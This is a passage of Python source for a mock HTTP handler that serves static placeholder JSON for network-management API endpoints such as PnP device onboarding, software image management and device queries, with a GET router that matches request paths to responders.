'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'systemWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'workflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'runSummaryList': [{'details': 'string', 'historyTaskInfo': {'type': 'string', 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string'}, 'errorFlag': True, 'timestamp': 0}], 'workflowParameters': {'topOfStackSerialNumber': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'configList': [{'configParameters': [{'key': 'string', 'value': 'string'}], 'configId': 'string'}]}, 'dayZeroConfig': {'config': 'string'}, 'dayZeroConfigPreview': {}, 'version': 0, 'tenantId': 'string'})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_d9a1fa9c4068b23c(self):
    """Match the request path against the PNP d9a1fa9c4068b23c route pattern."""
    return re.search(self.PNP_d9a1fa9c4068b23c_PATTERN, self.path)
def pnp_get_device_count_response(self):
    """Serve the mocked JSON payload for the PNP get-device-count endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'response': 0})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_80acb88e4ac9ac6d(self):
    """Match the request path against the PNP 80acb88e4ac9ac6d route pattern."""
    return re.search(self.PNP_80acb88e4ac9ac6d_PATTERN, self.path)
def pnp_get_workflowby_id_response(self):
    """Serve the mocked JSON payload for the PNP get-workflow-by-id endpoint."""
    # Status line, then headers, then the serialized body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    body = json.dumps({'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'})
    self.wfile.write(body.encode('utf-8'))
def matches_PNP_f09319674049a7d4(self):
    """Return the regex match (or None) for the PnP device-history endpoint path."""
    return re.search(self.PNP_f09319674049a7d4_PATTERN, self.path)
def pnp_get_device_history_response(self):
    """Mock reply for the PnP device-history endpoint: HTTP 200 with a static
    JSON list of history entries (placeholder values only).
    """
    # Add response status code.
    self.send_response(requests.codes.ok)
    # Add response headers.
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    # Add response content.
    response_content = json.dumps({'response': [{'timestamp': 0, 'details': 'string', 'historyTaskInfo': {'name': 'string', 'type': 'string', 'timeTaken': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'startTime': 0, 'endTime': 0, 'timeTaken': 0, 'outputStr': 'string'}], 'addnDetails': [{'key': 'string', 'value': 'string'}]}, 'errorFlag': True}], 'statusCode': 0})
    self.wfile.write(response_content.encode('utf-8'))
    return
def matches_PNP_e6b3db8046c99654(self):
    """Return the regex match (or None) for the PnP device-list endpoint path."""
    return re.search(self.PNP_e6b3db8046c99654_PATTERN, self.path)
def pnp_get_devicelist_response(self):
    """Mock reply for the PnP device-list endpoint: HTTP 200 with one static
    JSON device record (deviceInfo, workflows, run summary — all placeholders).
    """
    # Add response status code.
    self.send_response(requests.codes.ok)
    # Add response headers.
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    # Add response content.
    response_content = json.dumps({'deviceInfo': {'source': 'string', 'serialNumber': 'string', 'stack': True, 'mode': 'string', 'state': 'string', 'location': {'siteId': 'string', 'address': 'string', 'latitude': 'string', 'longitude': 'string', 'altitude': 'string'}, 'description': 'string', 'onbState': 'string', 'authenticatedMicNumber': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'featuresSupported': ['string'], 'cmState': 'string', 'firstContact': 0, 'lastContact': 0, 'macAddress': 'string', 'pid': 'string', 'deviceSudiSerialNos': ['string'], 'lastUpdateOn': 0, 'workflowId': 'string', 'workflowName': 'string', 'projectId': 'string', 'projectName': 'string', 'deviceType': 'string', 'agentType': 'string', 'imageVersion': 'string', 'fileSystemList': [{'type': 'string', 'writeable': True, 'freespace': 0, 'name': 'string', 'readable': True, 'size': 0}], 'pnpProfileList': [{'profileName': 'string', 'discoveryCreated': True, 'createdBy': 'string', 'primaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}, 'secondaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}}], 'imageFile': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'neighborLinks': [{'localInterfaceName': 'string', 'localShortInterfaceName': 'string', 'localMacAddress': 'string', 'remoteInterfaceName': 'string', 'remoteShortInterfaceName': 'string', 'remoteMacAddress': 'string', 'remoteDeviceName': 'string', 'remotePlatform': 'string', 'remoteVersion': 'string'}], 'lastSyncTime': 0, 'ipInterfaces': [{'status': 'string', 'macAddress': 'string', 'ipv4Address': {}, 'ipv6AddressList': [{}], 'name': 'string'}], 'hostname': 'string', 'authStatus': 'string', 'stackInfo': {'supportsStackWorkflows': True, 'isFullRing': True, 'stackMemberList': [{'serialNumber': 'string', 'state': 'string', 'role': 'string',
        'macAddress': 'string', 'pid': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'sudiSerialNumber': 'string', 'hardwareVersion': 'string', 'stackNumber': 0, 'softwareVersion': 'string', 'priority': 0}], 'stackRingProtocol': 'string', 'validLicenseLevels': ['string'], 'totalMemberCount': 0}, 'reloadRequested': True, 'addedOn': 0, 'siteId': 'string', 'aaaCredentials': {'password': 'string', 'username': 'string'}, 'userMicNumbers': ['string'], 'userSudiSerialNos': ['string'], 'addnMacAddrs': ['string'], 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'tags': {}, 'sudiRequired': True, 'smartAccountId': 'string', 'virtualAccountId': 'string', 'populateInventory': True, 'siteName': 'string', 'name': 'string'}, 'systemResetWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'systemWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name':
        'string', 'version': 0, 'tenantId': 'string'}, 'workflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'runSummaryList': [{'details': 'string', 'historyTaskInfo': {'type': 'string', 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string'}, 'errorFlag': True, 'timestamp': 0}], 'workflowParameters': {'topOfStackSerialNumber': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'configList': [{'configParameters': [{'key': 'string', 'value': 'string'}], 'configId': 'string'}]}, 'dayZeroConfig': {'config': 'string'}, 'dayZeroConfigPreview': {}, 'version': 0, 'tenantId': 'string'})
    self.wfile.write(response_content.encode('utf-8'))
    return
def matches_PNP_cf9418234d9ab37e(self):
    """Return the regex match (or None) for the PnP preview-config endpoint path."""
    return re.search(self.PNP_cf9418234d9ab37e_PATTERN, self.path)
def pnp_preview_config_response(self):
    """Reply 200 with the mocked PnP preview-config JSON payload."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'complete': True, 'config': 'string', 'error': True, 'errorMessage': 'string', 'expiredTime': 0, 'rfProfile': 'string', 'sensorProfile': 'string', 'siteId': 'string', 'startTime': 0, 'taskId': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_PNP_f3b26b5544cabab9(self):
    """Return the regex match (or None) for the PnP add-device endpoint path."""
    return re.search(self.PNP_f3b26b5544cabab9_PATTERN, self.path)
def pnp_add_device_response(self):
    """Mock reply for the PnP add-device endpoint: HTTP 200 echoing a static
    JSON device record (deviceInfo, workflows, run summary — all placeholders).
    """
    # Add response status code.
    self.send_response(requests.codes.ok)
    # Add response headers.
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    # Add response content.
    response_content = json.dumps({'_id': 'string', 'deviceInfo': {'source': 'string', 'serialNumber': 'string', 'stack': True, 'mode': 'string', 'state': 'string', 'location': {'siteId': 'string', 'address': 'string', 'latitude': 'string', 'longitude': 'string', 'altitude': 'string'}, 'description': 'string', 'onbState': 'string', 'authenticatedMicNumber': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'featuresSupported': ['string'], 'cmState': 'string', 'firstContact': 0, 'lastContact': 0, 'macAddress': 'string', 'pid': 'string', 'deviceSudiSerialNos': ['string'], 'lastUpdateOn': 0, 'workflowId': 'string', 'workflowName': 'string', 'projectId': 'string', 'projectName': 'string', 'deviceType': 'string', 'agentType': 'string', 'imageVersion': 'string', 'fileSystemList': [{'type': 'string', 'writeable': True, 'freespace': 0, 'name': 'string', 'readable': True, 'size': 0}], 'pnpProfileList': [{'profileName': 'string', 'discoveryCreated': True, 'createdBy': 'string', 'primaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}, 'secondaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}}], 'imageFile': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'neighborLinks': [{'localInterfaceName': 'string', 'localShortInterfaceName': 'string', 'localMacAddress': 'string', 'remoteInterfaceName': 'string', 'remoteShortInterfaceName': 'string', 'remoteMacAddress': 'string', 'remoteDeviceName': 'string', 'remotePlatform': 'string', 'remoteVersion': 'string'}], 'lastSyncTime': 0, 'ipInterfaces': [{'status': 'string', 'macAddress': 'string', 'ipv4Address': {}, 'ipv6AddressList': [{}], 'name': 'string'}], 'hostname': 'string', 'authStatus': 'string', 'stackInfo': {'supportsStackWorkflows': True, 'isFullRing': True, 'stackMemberList': [{'serialNumber': 'string', 'state': 'string',
        'role': 'string', 'macAddress': 'string', 'pid': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'sudiSerialNumber': 'string', 'hardwareVersion': 'string', 'stackNumber': 0, 'softwareVersion': 'string', 'priority': 0}], 'stackRingProtocol': 'string', 'validLicenseLevels': ['string'], 'totalMemberCount': 0}, 'reloadRequested': True, 'addedOn': 0, 'siteId': 'string', 'aaaCredentials': {'password': 'string', 'username': 'string'}, 'userMicNumbers': ['string'], 'userSudiSerialNos': ['string'], 'addnMacAddrs': ['string'], 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'tags': {}, 'sudiRequired': True, 'smartAccountId': 'string', 'virtualAccountId': 'string', 'populateInventory': True, 'siteName': 'string', 'name': 'string'}, 'systemResetWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'systemWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId':
        'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'workflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'runSummaryList': [{'details': 'string', 'historyTaskInfo': {'type': 'string', 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string'}, 'errorFlag': True, 'timestamp': 0}], 'workflowParameters': {'topOfStackSerialNumber': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'configList': [{'configParameters': [{'key': 'string', 'value': 'string'}], 'configId': 'string'}]}, 'dayZeroConfig': {'config': 'string'}, 'dayZeroConfigPreview': {}, 'version': 0, 'tenantId': 'string'})
    self.wfile.write(response_content.encode('utf-8'))
    return
def matches_PNP_d8a619974a8a8c48(self):
    """Return the regex match (or None) for the PnP claim-device endpoint path."""
    return re.search(self.PNP_d8a619974a8a8c48_PATTERN, self.path)
def pnp_claim_device_response(self):
    """Reply 200 with the mocked PnP claim-device JSON payload."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'jsonArrayResponse': [{}], 'jsonResponse': {}, 'message': 'string', 'statusCode': 0})
    self.wfile.write(payload.encode('utf-8'))
def matches_SWIM_0c8f7a0b49b9aedd(self):
    """Return the regex match (or None) for the SWIM image-details endpoint path."""
    return re.search(self.SWIM_0c8f7a0b49b9aedd_PATTERN, self.path)
def swim_getsoftwareimagedetails_response(self):
    """Mock reply for the SWIM get-software-image-details endpoint: HTTP 200
    with one static JSON image record (placeholder values only).
    """
    # Add response status code.
    self.send_response(requests.codes.ok)
    # Add response headers.
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    # Add response content.
    response_content = json.dumps({'response': [{'applicableDevicesForImage': [{'mdfId': 'string', 'productId': ['string'], 'productName': 'string'}], 'applicationType': 'string', 'createdTime': 'string', 'extendedAttributes': {}, 'family': 'string', 'feature': 'string', 'fileServiceId': 'string', 'fileSize': 'string', 'imageIntegrityStatus': 'string', 'imageName': 'string', 'imageSeries': ['string'], 'imageSource': 'string', 'imageType': 'string', 'imageUuid': 'string', 'importSourceType': 'DEVICE', 'isTaggedGolden': True, 'md5Checksum': 'string', 'name': 'string', 'profileInfo': [{'description': 'string', 'extendedAttributes': {}, 'memory': 0, 'productType': 'string', 'profileName': 'string', 'shares': 0, 'vCpu': 0}], 'shaCheckSum': 'string', 'vendor': 'string', 'version': 'string'}], 'version': 'string'})
    self.wfile.write(response_content.encode('utf-8'))
    return
def matches_SWIM_8cb6783b4faba1f4(self):
    """Return the regex match (or None) for the SWIM image-distribution endpoint path."""
    return re.search(self.SWIM_8cb6783b4faba1f4_PATTERN, self.path)
def swim_triggersoftwareimagedistribution_response(self):
    """Reply 200 with the mocked SWIM image-distribution task JSON payload."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_SWIM_4dbe3bc743a891bc(self):
    """Return the regex match (or None) for the SWIM local-image-import endpoint path."""
    return re.search(self.SWIM_4dbe3bc743a891bc_PATTERN, self.path)
def swim_importlocalsoftwareimage_response(self):
    """Reply 200 with the mocked SWIM local-image-import task JSON payload."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_SWIM_fb9beb664f2aba4c(self):
    """Return the regex match (or None) for the SWIM image-activation endpoint path."""
    return re.search(self.SWIM_fb9beb664f2aba4c_PATTERN, self.path)
def swim_triggersoftwareimageactivation_response(self):
    """Reply 200 with the mocked SWIM image-activation task JSON payload."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_SWIM_bc8aab4746ca883d(self):
    """Return the regex match (or None) for the SWIM import-via-URL endpoint path."""
    return re.search(self.SWIM_bc8aab4746ca883d_PATTERN, self.path)
def swim_importsoftwareimagevia_url_response(self):
    """Reply 200 with the mocked SWIM import-via-URL task JSON payload."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_SITE_PROFILE_7fbe4b804879baa4(self):
    """Return the regex match (or None) for the site-profile device-details-by-IP path."""
    return re.search(self.SITE_PROFILE_7fbe4b804879baa4_PATTERN, self.path)
def site_profile_get_devicedetailsby_ip_response(self):
    """Mock reply for the site-profile get-device-details-by-IP endpoint:
    HTTP 200 with a static JSON provisioning-detail record (placeholders only).
    """
    # Add response status code.
    self.send_response(requests.codes.ok)
    # Add response headers.
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    # Add response content.
    response_content = json.dumps({'provisionDetails': {'startTime': 'string', 'endTime': 'string', 'duration': 'string', 'statusMessage': 'string', 'status': 'string', 'taskNodes': [{'startTime': 'string', 'endTime': 'string', 'duration': 'string', 'status': 'string', 'nextTask': 'string', 'name': 'string', 'target': 'string', 'statusMessage': 'string', 'payload': 'string', 'provisionedNames': {}, 'errorPayload': {}, 'parentTask': {}, 'cliTemplateUserMessageDTO': {}, 'stepRan': 'string'}], 'topology': 'string', 'beginStep': 'string'}})
    self.wfile.write(response_content.encode('utf-8'))
    return
def matches_SITE_PROFILE_828828f44f28bd0d(self):
    """Return the regex match (or None) for the site-profile provision-NFV path."""
    return re.search(self.SITE_PROFILE_828828f44f28bd0d_PATTERN, self.path)
def site_profile_provision_nfv_response(self):
    """Reply 200 with the mocked NFV-provision execution JSON payload."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def matches_SITE_PROFILE_2f97e8fa45f8b2a3(self):
    """Return the regex match (or None) for the site-profile NFV-provisioning-detail path."""
    return re.search(self.SITE_PROFILE_2f97e8fa45f8b2a3_PATTERN, self.path)
def site_profile_nfv_provisioning_detail_response(self):
    """Reply 200 with the mocked NFV-provisioning-detail execution JSON payload."""
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    payload = json.dumps({'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'})
    self.wfile.write(payload.encode('utf-8'))
def do_GET(self):
    """Route a GET request to the mock responder of the first endpoint whose
    pattern matches ``self.path``; unmatched paths fall through unanswered.
    """
    # Ordered (matcher, responder) pairs — first match wins, preserving the
    # original registration order of the mock endpoints.
    routes = (
        (self.matches_TEMPLATE_PROGRAMMER_01b09a254b9ab259, self.template_programmer_getsthetemplatesavailable_response),
        (self.matches_TEMPLATE_PROGRAMMER_109d1b4f4289aecd, self.template_programmer_get_projects_response),
        (self.matches_TEMPLATE_PROGRAMMER_c8bf6b65414a9bc7, self.template_programmer_get_template_versions_response),
        (self.matches_TEMPLATE_PROGRAMMER_83a3b9404cb88787, self.template_programmer_get_template_details_response),
        (self.matches_TEMPLATE_PROGRAMMER_9c9a785741cbb41f, self.template_programmer_get_templatedeploymentstatus_response),
        (self.matches_TAG_2e9db85840fbb1cf, self.tag_get_tag_membercount_response),
        (self.matches_TAG_4695090d403b8eaa, self.tag_get_tagresourcetypes_response),
        (self.matches_TAG_8091a9b84bfba53b, self.tag_get_tag_count_response),
        (self.matches_TAG_c1a359b14c89b573, self.tag_get_tagby_id_response),
        (self.matches_TAG_eab7abe048fb99ad, self.tag_get_tagmembersby_id_response),
        (self.matches_TAG_ee9aab01487a8896, self.tag_get_tag_response),
        (self.matches_NETWORK_DISCOVERY_069d9823451b892d, self.network_discovery_getcountofalldiscoveryjobs_response),
        (self.matches_NETWORK_DISCOVERY_33b799d04d0a8907, self.network_discovery_get_discoveriesbyrange_response),
        (self.matches_NETWORK_DISCOVERY_3d9b99c343398a27, self.network_discovery_getnetworkdevicesfrom_discovery_response),
        (self.matches_NETWORK_DISCOVERY_44974ba5435a801d, self.network_discovery_get_snmpproperties_response),
        (self.matches_NETWORK_DISCOVERY_63bb88b74f59aa17, self.network_discovery_get_discoveryby_id_response),
        (self.matches_NETWORK_DISCOVERY_99872a134d0a9fb4, self.network_discovery_getlistofdiscoveriesbydiscovery_id_response),
        (self.matches_NETWORK_DISCOVERY_a6965b454c9a8663, self.network_discovery_get_devicesdiscoveredby_id_response),
        (self.matches_NETWORK_DISCOVERY_58a3699e489b9529, self.network_discovery_get_credentialsubtypebycredential_id_response),
        (self.matches_NETWORK_DISCOVERY_a4967be64dfaaa1a, self.network_discovery_get_discoveryjobsby_ip_response),
        (self.matches_NETWORK_DISCOVERY_a6b798ab4acaa34e, self.network_discovery_get_discovereddevicesbyrange_response),
        (self.matches_NETWORK_DISCOVERY_ff816b8e435897eb, self.network_discovery_get_globalcredentials_response),
        (self.matches_NETWORK_DISCOVERY_f6ac994f451ba011, self.network_discovery_get_discoverednetworkdevicesbydiscovery_id_response),
        (self.matches_TASK_26b44ab04649a183, self.task_gettaskcount_response),
        (self.matches_TASK_a1a9387346ba92b1, self.task_gettaskby_id_response),
        (self.matches_TASK_e78bb8a2449b9eed, self.task_gettasks_response),
        (self.matches_TASK_f5a269c44f2a95fa, self.task_gettasktree_response),
        (self.matches_TASK_e487f8d3481b94f2, self.task_gettaskby_operation_id_response),
        (self.matches_COMMAND_RUNNER_33bb2b9d40199e14, self.command_runner_getallkeywordsof_cli_saccepted_response),
        (self.matches_FILE_3f89bbfc4f6b8b50, self.file_getlistofavailablenamespaces_response),
        (self.matches_FILE_42b6a86e44b8bdfc, self.file_getlistoffiles_response),
        (self.matches_FILE_9698c8ec4a0b8c1a, self.file_downloadafilebyfile_id_response),
        (self.matches_PATH_TRACE_55bc3bf94e38b6ff, self.path_trace_retrivesallprevious_pathtracessummary_response),
        (self.matches_PATH_TRACE_7ab9a8bd4f3b86a4, self.path_trace_retrievesprevious_pathtrace_response),
        (self.matches_NON_FABRIC_WIRELESS_6896993e41b8bd7a, self.non_fabric_wireless_get_wireless_profile_response),
        (self.matches_NON_FABRIC_WIRELESS_cca519ba45ebb423, self.non_fabric_wireless_get_enterprise_ssid_response),
        (self.matches_FABRIC_WIRED_d0b3593c4a7aaf22, self.fabric_wired_getsborderdevicedetailsfrom_sda_fabric_response),
        (self.matches_DEVICES_0db7da744c0b83d8, self.devices_get_module_infoby_id_response),
        (self.matches_DEVICES_20b19b52464b8972, self.devices_get_devicelist_response),
        (self.matches_DEVICES_288df9494f2a9746, self.devices_get_device_interface_vlans_response),
        (self.matches_DEVICES_38bd0b884b89a785, self.devices_get_polling_intervalforalldevices_response),
        (self.matches_DEVICES_349c888443b89a58, self.devices_get_device_interfacesbyspecifiedrange_response),
        (self.matches_DEVICES_3d923b184dc9a4ca, self.devices_get_device_interface_count_response),
        (self.matches_DEVICES_4eb56a614cc9a2d2, self.devices_get_interfacedetails_response),
        (self.matches_DEVICES_5b8639224cd88ea7, self.devices_get_device_interfacecountbyid_response),
        (self.matches_DEVICES_5db21b8e43fab7d8, self.devices_get_device_count_response),
        (self.matches_DEVICES_70ad397649e9b4d3, self.devices_get_ospfinterfaces_response),
        (self.matches_DEVICES_82918a1b4d289c5c, self.devices_get_polling_intervalby_id_response),
        (self.matches_DEVICES_84b37ae54c59ab28, self.devices_get_organizationlistfor_meraki_response),
        (self.matches_DEVICES_81bb4804405a8d2f, self.devices_get_functional_capabilityby_id_response),
        (self.matches_DEVICES_84ad8b0e42cab48a, self.devices_get_isisinterfaces_response),
        (self.matches_DEVICES_84b33a9e480abcaf, self.devices_get_device_configby_id_response),
        (self.matches_DEVICES_819f9aa54feab7bf, self.devices_get_device_summary_response),
        (self.matches_DEVICES_8fa8eb404a4a8d96, self.devices_get_deviceby_id_response),
        (self.matches_DEVICES_ba9dc85b4b8a9a17, self.devices_get_interfaceinfoby_id_response),
        (self.matches_DEVICES_c9809b6744f8a502, self.devices_registerdevicefor_wsa_response),
        (self.matches_DEVICES_b7bcaa084e2b90d0, self.devices_get_device_configforalldevices_response),
        (self.matches_DEVICES_cd8469e647caab0e, self.devices_get_interfaceby_ip_response),
        (self.matches_DEVICES_d0a4b88145aabb51, self.devices_get_network_deviceby_ip_response),
        (self.matches_DEVICES_888f585c49b88441, self.devices_get_device_config_count_response),
        (self.matches_DEVICES_d888ab6d4d59a8c1, self.devices_get_deviceby_serialnumber_response),
        (self.matches_DEVICES_f5947a4c439a8bf0, self.devices_getallinterfaces_response),
        (self.matches_DEVICES_8db939744649a782, self.devices_get_modulecount_response),
        (self.matches_DEVICES_eb8249e34f69b0f1, self.devices_get_modules_response),
